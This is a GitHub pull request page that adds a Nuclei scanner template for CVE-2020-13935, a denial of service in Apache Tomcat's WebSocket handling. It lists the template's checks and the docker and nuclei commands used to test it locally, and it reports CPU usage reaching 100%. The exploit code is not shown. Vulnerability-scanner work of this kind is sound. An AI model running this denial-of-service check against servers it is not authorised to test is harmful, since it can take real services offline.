Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add CVE-2020-13935.yaml Template - Apache Tomcat WebSocket Frame Payload Length Validation Denial of Service #11164

Merged
merged 2 commits into from
Dec 13, 2024

Conversation

sttlr
Copy link
Contributor

@sttlr sttlr commented Nov 7, 2024

Template / PR Information

Wrote template for CVE-2020-13935 - Apache Tomcat WebSocket Frame Payload Length Validation Denial of Service

Checks:

  • If Tomcat WebSocket echo example page exists
  • If WebSocket echo example works
  • If there is a read timeout after sending the malformed WebSocket Message (target is vulnerable)
  • If there is no protocol error received (otherwise target is not vulnerable)

References:

Template Validation

I've validated this template locally?

  • YES
  • NO

Spin up vulnerable Tomcat:

docker run --rm -it -p 8080:8080 --platform linux/amd64 --name tomcat_vulnerable --cpus 1 tomcat:8.0.51-jre8-slim

Check CPU usage - practically zero:

image

Run the template:

go run /Users/sttlr/tools/nuclei-dev/cmd/nuclei/main.go -code -itags dos -t /Users/sttlr/sttlr-nuclei-templates/CVE-2020-13935.yaml -u http://127.0.0.1:8080/ -v
image

Check CPU usage - 100%:
image

Additional Details (leave it blank if not applicable)

Run on dev nuclei - because code templates with engine set to go don't work on the latest nuclei version v3.3.5 - see projectdiscovery/nuclei#5759.

github.com/gorilla/websocket@v1.4.2 needs to be installed for the exploit to run - template tries to install in the first code block.

/claim #11019

Additional References:

Copy link

algora-pbc bot commented Nov 7, 2024

👉 To complete your submission, sign up on Algora, link your Github account and submit the data for your PR.
💵 To receive payouts, sign up on Algora, link your Github account and connect with Stripe.

@GeorginaReeder
Copy link

Thanks so much for your contribution @sttlr ! :)

@princechaddha princechaddha merged commit 82321a9 into projectdiscovery:main Dec 13, 2024
3 checks passed
@princechaddha princechaddha added the Done Ready to merge label Dec 13, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging this pull request may close these issues.

3 participants